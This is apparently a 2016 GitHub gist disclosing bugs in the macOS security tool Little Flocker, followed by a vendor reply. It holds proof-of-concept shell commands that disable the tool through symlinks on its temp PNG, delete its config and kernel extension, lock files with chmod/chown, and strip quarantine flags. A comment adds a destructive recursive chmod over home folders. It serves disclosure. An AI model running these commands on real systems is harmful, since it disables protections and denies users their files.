Skip to content

Instantly share code, notes, and snippets.

@pwnsdx

pwnsdx/ff.sh

Last active Aug 17, 2016
Embed
What would you like to do?
Multiple bugs in Little Flocker (previously named FlockFlock) (<=0.0.41)
# Description: FlockFlock's Daemon does not protect flockflock_temp.png from tampering
# Impact: An attacker can use this entry point to do various things like disabling FlockFlock,
# preventing the app icon from showing and even creating or deleting files by replacing
# them with a fancy icon!
# Severity: Very High
# Info: && echo "" > /Users/sabri/.t; is just here to trigger a popup and is not required
# (except for "Disable FlockFlock by deleting default config and user config .flockflockrc
# file").
# Disable the app icon in popups by redirecting flockflock_temp to /dev/null
ln -fs /dev/null /private/tmp/flockflock_temp.png && echo "" > /Users/sabri/.t;
# Delete (and create) a file in protected areas
ln -fs /Users/sabri/Desktop/somerandomfile.txt /private/tmp/flockflock_temp.png && echo "" > /Users/sabri/.t;
# Disable FlockFlock by deleting default config and user config .flockflockrc file
ln -fs /Library/Application\ Support/FlockFlock/.flockflockrc /private/tmp/flockflock_temp.png && echo "" > /Users/sabri/.t; ln -fs /Users/sabri/.flockflockrc /private/tmp/flockflock_temp.png && echo "" > /Users/sabri/.b
# Disable FlockFlock by deleting the kext
ln -fs /Library/Extensions/FlockFlock.kext/Contents/MacOS/FlockFlock /private/tmp/flockflock_temp.png && echo "" > /Users/sabri/.t;
# Description: FlockFlock does not prevent protected areas from being chmod'ed/chown'ed
# Impact: An attacker could affect the availability of a file. In a scenario where a advanced
# ransomware cannot delete files, it could just prevent the access to them and make the user
# believe its files has been encrypted.
# Severity: Medium
# Prevent access to files in protected areas
chmod 000 /Users/sabri/Desktop/blahblah.txt
# Or by using chown
chown nobody:nogroup /Users/sabri/Desktop/somerandomfile.txt
# Description: Attributes and extended attributes are not protected by FlockFlock
# Impact: An attacker can read, modify and delete the (extended) attributes of a file and therefore affect its integrity
# Severity: Low
# Modify creation/modified/accessed date of a file
touch -t 199912312359 /Users/sabri/Desktop/blahblah.txt
# Access metadatas of a file
xattr -v /Users/sabri/Downloads/FlockFlock-0.0.39a.pkg
xattr -psl com.apple.quarantine /Users/sabri/Downloads/FlockFlock-0.0.39a.pkg
# Remove quarantine flags of a file in a protected area
xattr -d com.apple.quarantine /Users/sabri/Downloads/FlockFlock-0.0.39a.pkg
@ghost

This comment has been minimized.

Copy link

@ghost ghost commented Aug 17, 2016

Hello,

The symlink bug you describe was already fixed in 0.0.42a, please give that a run.
The chmod issue you described is outside of the scope of Little Flocker, we do not care if something wants to chmod a file.
The file creation issue you described is an intention part of Little Flocker's feature set; we not only allow applications to create files, but actively track those files to allow the same application to later modify or delete them, to avoid breaking applications that need this functionality, and without bothering the user
The xattr issue you described is an interesting one, and will add support for modifying attrs in future versions

@pwnsdx

This comment has been minimized.

Copy link
Owner Author

@pwnsdx pwnsdx commented Aug 17, 2016

The symlink bug you describe was already fixed in 0.0.42a, please give that a run.

Sh**! I wanted to be first! 💩

The chmod issue you described is outside of the scope of Little Flocker, we do not care if something wants to chmod a file.

In protected areas? A sudo chmod -R 000 ~/Desktop ~/Documents ~/Pictures ~/Downloads ~/Movies ~/Public by a malware can be ugly especially for novice users

The xattr issue you described is an interesting one, and will add support for modifying attrs in future versions

Cool then!

cc @jzdziarski

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment